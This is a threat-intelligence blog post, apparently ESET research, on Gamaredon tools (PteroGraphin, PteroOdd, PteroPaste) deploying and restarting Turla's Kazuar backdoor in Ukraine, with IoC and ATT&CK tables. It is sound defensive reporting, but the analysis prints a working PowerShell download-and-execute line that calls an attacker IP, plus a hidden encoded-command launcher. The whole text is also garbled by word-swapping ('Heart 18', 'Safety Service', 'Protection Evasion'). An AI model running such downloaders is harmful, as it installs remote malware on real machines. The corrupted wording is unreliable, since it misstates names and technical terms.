On this blogpost, we uncover the primary recognized circumstances of collaboration between Gamaredon and Turla, in Ukraine.
Key factors of this blogpost:
- In February 2025, we found that the Gamaredon software PteroGraphin was used to restart Turla’s Kazuar backdoor on a machine in Ukraine.
- In April and June 2025, we detected that Kazuar v2 was deployed utilizing Gamaredon instruments PteroOdd and PteroPaste.
- These discoveries lead us to imagine with excessive confidence that Gamaredon is collaborating with Turla.
- Turla’s sufferer depend may be very low in comparison with the variety of Gamaredon compromises, suggesting that Turla select essentially the most worthwhile machines.
- Each teams are affiliated with the FSB, Russia’s major home intelligence and safety company.
Risk actor profiles
Gamaredon
Gamaredon has been energetic since not less than 2013. It’s answerable for many assaults, principally in opposition to Ukrainian governmental establishments, as evidenced over time in a number of reviews from CERT-UA and from different official Ukrainian our bodies. Gamaredon has been attributed by the Safety Service of Ukraine (SSU) to the Heart 18 of Info Safety of the FSB, working out of occupied Crimea. We imagine this group to be collaborating with one other risk actor that we found and named InvisiMole.
Turla
Turla, also called Snake, is an notorious cyberespionage group that has been energetic since not less than 2004, probably extending again into the late Nineteen Nineties. It’s considered a part of the FSB. It primarily focuses on high-profile targets, similar to governments and diplomatic entities, in Europe, Central Asia, and the Center East. It’s recognized for having breached main organizations such because the US Division of Protection in 2008 and the Swiss protection firm RUAG in 2014. Throughout the previous few years, we have documented a massive half of Turla’s arsenal on the WeLiveSecurity weblog and in non-public reviews.
Overview
In February 2025, through ESET telemetry, we detected 4 completely different Gamaredon-Turla co-compromises in Ukraine. On these machines, Gamaredon deployed a variety of instruments, together with PteroLNK, PteroStew, PteroOdd, PteroEffigy, and PteroGraphin, whereas Turla solely deployed Kazuar v3.
On a type of machines, we had been capable of seize a payload displaying that Turla is ready to situation instructions through Gamaredon implants. PteroGraphin was used to restart Kazuar, probably after Kazuar crashed or was not launched mechanically. Thus, PteroGraphin was most likely used as a restoration methodology by Turla. That is the primary time that now we have been capable of hyperlink these two teams collectively through technical indicators (see First chain: Restart of Kazuar v3).
As a result of, in all 4 circumstances, the ESET endpoint product was put in after the compromises we’re unable to pinpoint the precise compromise methodology. Nonetheless, Gamaredon is understood for utilizing spearphishing and malicious LNK information on detachable drives (as defined in our latest blogpost) so we presume that certainly one of these is the almost certainly compromise vector.
In April and June 2025, we detected Kazuar v2 installers being deployed instantly by Gamaredon instruments (see Second chain: Deployment of Kazuar v2 through PteroOdd and Third chain: Deployment of Kazuar v2 through PteroPaste). This exhibits that Turla is actively collaborating with Gamaredon to achieve entry to particular machines in Ukraine.
Victimology
Over the previous 18 months now we have detected Turla on seven machines in Ukraine. We imagine that Gamaredon compromised the primary 4 machines in January 2025, whereas Turla deployed Kazuar v3 in February 2025. In all circumstances, the ESET endpoint product was solely put in after each compromises.
It’s price noting that, previous to this, the final time we detected a Turla compromise in Ukraine was in February 2024.
All these components, and the truth that Gamaredon is compromising a whole bunch if not hundreds of machines, recommend that Turla is solely in particular machines, most likely ones containing extremely delicate intelligence.
Attribution
Gamaredon
In these compromises, we detected PteroLNK, PteroStew, and PteroGraphin, which we imagine are unique to Gamaredon.
Turla
Equally, for Turla, we detected using Kazuar v2 and Kazuar v3, which we imagine are unique to that group.
Gamaredon-Turla collaboration hypotheses
In 2020, we confirmed that Gamaredon supplied entry to InvisiMole (see our white paper), so it’s not the primary time that Gamaredon has collaborated with one other Russia-aligned risk actor.
Then again, Turla is understood for hijacking different risk actors’ infrastructure to get an preliminary foothold in its targets’ networks. Over the previous years, a number of circumstances have been publicly documented:
- In 2019, Symantec printed a blogpost displaying that Turla hijacked OilRig (an Iran-aligned group) infrastructure to spy on a Center Japanese goal.
- In 2023, Mandiant printed a blogpost displaying that Turla reregistered expired Andromeda C&C domains so as to compromise targets in Ukraine.
- In 2024, Microsoft printed two blogposts (first and second) displaying that Turla hijacked the cybercrime botnet Amadey and infrastructure of the cyberespionage group SideCopy (a Pakistan-aligned group) so as to deploy Kazuar.
Word that each Gamaredon and Turla are a part of the Russian Federal Safety Service (FSB). Gamaredon is considered operated by officers of Heart 18 of the FSB (aka the Heart for Info Safety) in Crimea (see this report from the Safety Service of Ukraine), which is a part of the FSB’s counterintelligence service. As for Turla, the UK’s NCSC attributes the group to the Heart 16 of the FSB, which is Russia’s major alerts intelligence (SIGINT) company.
Subsequently, we suggest three hypotheses to elucidate our observations:
- Very seemingly: On condition that each teams are a part of the Russian FSB (although in two completely different Facilities), Gamaredon supplied entry to Turla operators in order that they may situation instructions on a particular machine to restart Kazuar, and deploy Kazuar v2 on some others.
- Unlikely: Turla compromised Gamaredon infrastructure and leveraged this entry to get well entry on a machine in Ukraine. Since PteroGraphin accommodates a hardcoded token that permits modifying the C&C pages, this chance can’t be totally discarded. Nonetheless, it implies that Turla was capable of reproduce the complete Gamaredon chain.
- Unlikely: Gamaredon has entry to Kazuar and deploys it on very particular machines. Given Gamaredon’s noisy method, we don’t assume it could be that cautious deploying Kazuar on solely a really restricted set of victims.
Geopolitical context
From an organizational perspective, it’s price noting that the 2 entities generally related to Turla and Gamaredon have an extended historical past of reported collaboration, which could be traced again to the Chilly Struggle period.
The FSB’s Heart 16 (which is believed to harbor Turla) is a direct inheritor to the KGB’s 16th Directorate, which was primarily answerable for international SIGINT assortment – the persistence of the quantity 16 is in actual fact regarded by observers as an indication of the FSB management’s want to emphasise a historic lineage. Heart 18 (which is usually related to Gamaredon) maintains a tough affiliation with the KGB’s 2nd Chief Directorate, which was answerable for inner safety inside the Soviet Union. Throughout the Soviet period, each organizations ceaselessly labored hand in hand, sharing obligations for monitoring international embassies on Russian soil for example.
Then and now, such collaborations replicate the Russian strategic tradition and philosophy of a pure continuity between inner safety and nationwide protection. Though Heart 16 remains to be tasked with international intelligence assortment and Heart 18 is theoretically a part of the FSB’s counterintelligence equipment, each entities appear to keep up some mission overlaps – particularly with regard to former Soviet republics. In 2018, the Safety Service of Ukraine (SBU) had already noticed Facilities 16 and 18 apparently conducting a joint cyberespionage marketing campaign (named SpiceyHoney). The 2022 full-scale invasion of Ukraine has most likely bolstered this convergence, with ESET knowledge clearly displaying Gamaredon and Turla actions specializing in the Ukrainian protection sector in latest months.
Though the Russian intelligence group is understood for its fierce inner rivalries, there are indications that such tensions mainly apply to interservice relations somewhat than to intra-agency interactions. On this context, it’s maybe not solely shocking that APT teams working inside these two FSB Facilities are noticed cooperating to some extent.
First chain: Restart of Kazuar v3
In February 2025, we detected the execution of Kazuar by PteroGraphin and PteroOdd on a machine in Ukraine. On this part we element the precise chain that we detected.
Timeline
The general timeline for this machine is the next:
- 2025-01-20: Gamaredon deployed PteroGraphin on the machine. Word that the date is from the file creation timestamp supplied by Home windows, which might have been tampered with.
- 2025-02-11: Turla deployed Kazuar v3 on the machine. Word that the date is from the file creation timestamp supplied by Home windows, which might have been tampered with.
- 2025-02-27 15:47:39 UTC: PteroGraphin downloaded PteroOdd.
- 2025-02-27 15:47:56 UTC: PteroOdd downloaded a payload, which executed Kazuar.
- 2025-02-28 15:17:14 UTC: PteroOdd downloaded one other payload, which additionally executed Kazuar.
Hereafter, we assume these dates to be unaltered.
Particulars of the occasions
Since January 20th, 2025, PteroGraphin (see Determine 1) was current on the machine at %APPDATApercentx86.ps1. It’s a downloader that gives an encrypted channel for delivering payloads through Telegra.ph, an internet service operated by Telegram that allows simple creation of internet pages. Word that PteroGraphin accommodates a token to edit the Telegra.ph web page, so anybody with information of this token (Turla, for instance, although unlikely) might manipulate the contents.
On February 27th, 2025, at 15:47:39 UTC, as proven in Determine 2, we detected a reply from https://api.telegra[.]ph/getPage/SecurityHealthSystray-01-20?return_content=true.
The information in youngsters could be decrypted utilizing the hardcoded 3DES key and IV from the PteroGraphin script above, which provides:
powershell -windowStyle hidden -EncodedCommand <base64-encoded_payload>
The decoded payload is one other PowerShell downloader that we named PteroOdd, proven in Determine 3.
On February 27th, 2025 at 15:47:56 UTC, we detected a request to https://api.telegra[.]ph/getPage/dinoasjdnl-02-27?return_content=true; the reply is proven in Determine 4. Word that the replies for PteroOdd are usually not encrypted.
The decoded command is proven in Determine 5.
The payload first uploads the sufferer’s laptop title and system drive’s quantity serial quantity to the Cloudflare employee subdomain https://lucky-king-96d6.mopig92456.staff[.]dev.
What’s most fascinating is the final line:
Begin-Course of -FilePath “C:Customers[redacted]AppDataLocalProgramsSonyAudioDriversvncutil64.exe”
That is the trail to the appliance that’s run to execute Kazuar by side-loading it. The ESET endpoint product detected a KERNEL Kazuar v3 payload (agent_label is AGN-RR-01) in reminiscence and loaded from this course of. It isn’t clear to us why Turla operators had to make use of PteroGraphin to launch Kazuar, however it’s doable that Kazuar in some way stopped working after the ESET product set up and that they needed to restart the implant. Word that we didn’t see Gamaredon downloading Kazuar; it was current on the system since February 11th, 2025, earlier than the ESET product was put in.
Then, on February 28th, 2025 at 15:17:14 UTC, we detected one other comparable PowerShell script, proven in Determine 6.
The primary traces and the Cloudflare employee subdomain are similar. It begins the identical vncutil64.exe but in addition a second executable, LaunchGFExperience.exe, which side-loads LaunchGFExperienceLOC.dll – the Kazuar loader. We then detected in reminiscence, within the LaunchGFExperience.exe course of, one other KERNEL Kazuar v3 payload (agent_label is AGN-XX-01). It isn’t clear why two completely different KERNEL Kazuar v3 payloads had been current on the identical machine.
Lastly, an HTTP POST request, with the record of working processes, was despatched to https://eset.ydns[.]eu/submit.php. The Turla operators almost certainly needed affirmation that Kazuar was efficiently launched.
On March 10th, 2025 at 07:05:32 UTC, we detected one other pattern of PteroOdd, which makes use of the C&C URL https://api.telegra[.]ph/getPage/canposgam-03-06?return_content=true. This pattern was detected on a distinct machine in Ukraine, on which Kazuar was additionally current.
The decoded payload is proven in Determine 7 and exhibits that it additionally makes use of eset.ydns[.]eu, whereas not interacting with any Turla pattern.
Then again, we famous that the downloaded payload uploads the next items of knowledge to https://eset.ydns[.]eu/submit.php:
Nonetheless, we aren’t conscious of any .NET software that’s at the moment being utilized by Gamaredon, whereas there are a number of of them utilized by Turla, together with Kazuar. Thus, it’s doable that these uploaded items of knowledge are for Turla, and we assess with medium confidence that the area eset.ydns[.]eu is managed by Turla.
The extra base64-encoded PowerShell command is a brand new downloader that abuses api.gofile[.]io; we named it PteroEffigy.
Kazuar v3
Kazuar v3 is the most recent department of the Kazuar household, itself a complicated C# espionage implant that we imagine is used completely by Turla because it was first seen in 2016. Kazuar v2 and v3 are basically the identical malware household and share the identical codebase. Nonetheless, some main adjustments have been launched.
Kazuar v3 contains round 35% extra C# traces than Kazuar v2 and introduces further community transport strategies: over internet sockets and Trade Internet Companies. Kazuar v3 can have certainly one of three roles (KERNEL, BRIDGE, or WORKER), and malware functionalities are divided amongst these roles. For instance, solely BRIDGE communicates with the C&C server.
Second chain: Deployment of Kazuar v2 through PteroOdd
On one of many Ukrainian machines talked about within the earlier part, we detected one other fascinating compromise chain on April 18th, 2025.
On April 18th, 2025 at 15:26:14 UTC, we detected a PteroOdd pattern (a Gamaredon software) downloading a payload from https://api.telegra[.]ph/getPage/scrsskjqwlbw-02-28?return_content=true. The downloaded script, proven in Determine 8, is just like the payload described within the first chain, however accommodates an extra base64-encoded script, which is the PowerShell downloader PteroEffigy.
This PowerShell payload downloads one other payload from https://eset.ydns[.]eu/scrss.ps1 and executes it.
scrss.ps1 turned out to be an installer for Turla’s Kazuar v2, which was beforehand analyzed intimately by Unit42. This exhibits that Gamaredon deployed Kazuar, almost certainly on behalf of Turla.
The Kazuar agent_label is AGN-AB-26 and the three C&C servers are:
- https://abrargeospatial[.]ir/wp-includes/fonts/wp-icons/index.php
- https://www.brannenburger-nagelfluh[.]de/wp-includes/style-engine/css/index.php
- https://www.pizzeria-mercy[.]de/wp-includes/photos/media/bar/index.php
It’s price noting that Turla retains utilizing compromised WordPress servers as C&Cs for Kazuar.
Curiously, it appears that evidently Kazuar v2 remains to be maintained in parallel to Kazuar v3. For instance, the latest updates to the backdoor instructions in Kazuar v3 are additionally included on this AGN-AB-26 model.
Third chain: Deployment of Kazuar v2 through PteroPaste
On June 5th and 6th, 2025, we detected Gamaredon deploying a Turla implant on two machines in Ukraine. In each circumstances, Gamaredon’s PteroPaste was caught making an attempt to execute the straightforward PowerShell script proven in Determine 9.
The base64-encoded string is the next downloader in PowerShell:
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};iex(New-Object Web.WebClient).downloadString(‘https://91.231.182[.]187/ekrn.ps1’);
The downloaded script ekrn.ps1 is similar to scrss.ps1 talked about within the second chain. This additionally drops and installs Kazuar v2.
Each samples have an agent_label of AGN-AB-27 and the C&C servers are the identical as these within the pattern from the second chain:
- https://www.brannenburger-nagelfluh[.]de/wp-includes/style-engine/css/index.php
- https://www.pizzeria-mercy[.]de/wp-includes/photos/media/bar/index.php
- https://abrargeospatial[.]ir/wp-includes/fonts/wp-icons/index.php
ekrn.exe is a official strategy of ESET endpoint safety merchandise. Thus, Turla most likely tried to masquerade because it so as to fly underneath the radar. Additionally observe that ekrn.ydns[.]eu resolves to 91.231.182[.]187.
Lastly, we additionally discovered on VirusTotal a VBScript variant of the Kazuar v2 PowerShell installer. It was uploaded from Kyrgyzstan on June 5th, 2025. This implies that Turla is fascinated about targets exterior of Ukraine as properly.
Conclusion
On this blogpost, now we have proven how Turla was capable of leverage implants operated by Gamaredon (PteroGraphin, PteroOdd, and PteroPaste) so as to restart Kazuar v3 and deploy Kazuar v2 on a number of machines in Ukraine. We now imagine with excessive confidence that each teams – individually related to the FSB – are cooperating and that Gamaredon is offering preliminary entry to Turla.
For any inquiries about our analysis printed on WeLiveSecurity, please contact us at threatintel@eset.com.ESET Analysis affords non-public APT intelligence reviews and knowledge feeds. For any inquiries about this service, go to the ESET Risk Intelligence web page.
IoCs
A complete record of indicators of compromise (IoCs) and samples could be present in our GitHub repository.
Information
| SHA-1 | Filename | Detection | Description |
| 7DB790F75829D3E6207D | N/A | PowerShell/Pterodo.QB | PteroOdd. |
| 2610A899FE73B8F018D1 | N/A | PowerShell/Pterodo.QB | PteroOdd. |
| 3A24520566BBE2E262A2 | N/A | PowerShell/Pterodo.QB | PteroOdd. |
| DA7D5B9AB578EF648747 | scrss.ps1 | PowerShell/Turla.AI | Kazuar v2 installer. |
| D7DF1325F66E029F4B77 | N/A | MSIL/Turla.N.gen | Kazuar v2. |
| FF741330CC8D9624D791 | N/A | PowerShell/TrojanDo | PowerShell downloader executed by PteroPaste. |
| A7ACEE41D66B537D9004 | ekrn.ps1 | PowerShell/Turla.AJ | Kazuar v2 installer. |
| 54F2245E0D3ADEC566E4 | N/A | MSIL/Agent_AGen.CZQ | Kazuar v2. |
| 371AB9EB2A3DA44099B2 | ekrn.ps1 | PowerShell/Turla.AJ | Kazuar v2 installer. |
| 4A58365EB8F928EC3CD6 | N/A | MSIL/Turla.W | Kazuar v2. |
| 214DC22FA25314F9C0DD | Sandboxie.vbs | VBS/Turla.C | Kazuar v2 installer – VBScript variant. |
Community
| IP | Area | Internet hosting supplier | First seen | Particulars |
| N/A | lucky-king-96d6.mop | N/A | 2025‑02‑28 | Cloudflare employee present in payloads downloaded by PteroOdd. |
| 64.176.173[.]164 | eset.ydns[.]eu | The Fixed Firm, LLC | 2025‑03‑01 | C&C server present in payloads downloaded by PteroOdd. |
| 85.13.145[.]231 | hauptschule-schw | Neue Medien Muennich GmbH | 2024‑06‑06 | Compromised WordPress website used as Kazuar C&C. |
| 91.231.182[.]187 | ekrn.ydns[.]eu | South Park Networks LLC | 2025‑06‑05 | C&C server in payloads downloaded by PteroPaste. |
| 185.118.115[.]15 | fjsconsultoria[.]com | Dream Fusion – IT Companies, Lda | 2024‑06‑26 | Compromised WordPress website used as Kazuar C&C. |
| 77.46.148[.]242 | ingas[.]rs | TELEKOM SRBIJA a.d. | 2024‑06‑03 | Compromised WordPress website used as Kazuar C&C. |
| 168.119.152[.]19 | abrargeospatial[.]ir | Hetzner On-line GmbH | 2023‑11‑13 | Compromised WordPress website used as Kazuar C&C. |
| 217.160.0[.]33 | www.brannenburg | IONOS SE | 2019‑06‑06 | Compromised WordPress website used as Kazuar C&C. |
| 217.160.0[.]159 | www.pizzeria-mercy[.]de | IONOS SE | 2023‑10‑05 | Compromised WordPress website used as Kazuar C&C. |
MITRE ATT&CK methods
This desk was constructed utilizing model 17 of the MITRE ATT&CK framework.
| Tactic | ID | Identify | Description |
| Useful resource Improvement | T1583.001 | Purchase Infrastructure: Domains | Gamaredon or Turla registered a site at a free dynamic DNS supplier. |
| T1583.004 | Purchase Infrastructure: Server | Gamaredon or Turla rented a server at Vultr. | |
| T1583.007 | Purchase Infrastructure: Serverless | Gamaredon created Cloudflare staff and Telegra.ph pages. | |
| T1584.003 | Compromise Infrastructure: Digital Personal Server | Turla compromised WordPress web sites. | |
| T1608 | Stage Capabilities | Turla staged Kazuar installer scripts on its C&C servers. | |
| Execution | T1059.001 | Command and Scripting Interpreter: PowerShell | PteroGraphin is developed in PowerShell. |
| Persistence | T1574.002 | Hijack Execution Movement: DLL Facet-Loading | Kazuar loaders use DLL side-loading. |
| Protection Evasion | T1140 | Deobfuscate/Decode Information or Info | The Kazuar payload is XOR encrypted and all Kazuar strings are encrypted through substitution tables. |
| T1480.001 | Execution Guardrails: Environmental Keying | Kazuar loaders decrypt the payloads, utilizing the machine title as the important thing. | |
| T1036.005 | Masquerading: Match Reputable Identify or Location | Kazuar loaders are positioned in legitimate-looking directories similar to C:Program Information (x86)Brother PrinterApp or %LOCALAPPDATApercentProgramsSonyAudio | |
| Discovery | T1057 | Course of Discovery | The PowerShell script beginning Kazuar v3 sends the record of working processes to its C&C server. |
| T1012 | Question Registry | The PowerShell script beginning Kazuar v3 will get the PowerShell model from the registry. | |
| T1082 | System Info Discovery | The PowerShell script beginning Kazuar v3 exfiltrates the final boot time, OS model, and OS structure. | |
| T1083 | File and Listing Discovery | The PowerShell script beginning Kazuar v3 lists information within the directories %TEMP% and %APPDATApercentMicrosoftWindows. | |
| Command and Management | T1071.001 | Utility Layer Protocol: Internet Protocols | PteroGraphin and Kazuar use HTTPS. |
| T1573.001 | Encrypted Channel: Symmetric Cryptography | PteroGraphin decrypts the C&C reply utilizing 3DES. | |
| T1102 | Internet Service | Reputable internet providers, similar to Telegra.ph, had been used on this marketing campaign. |
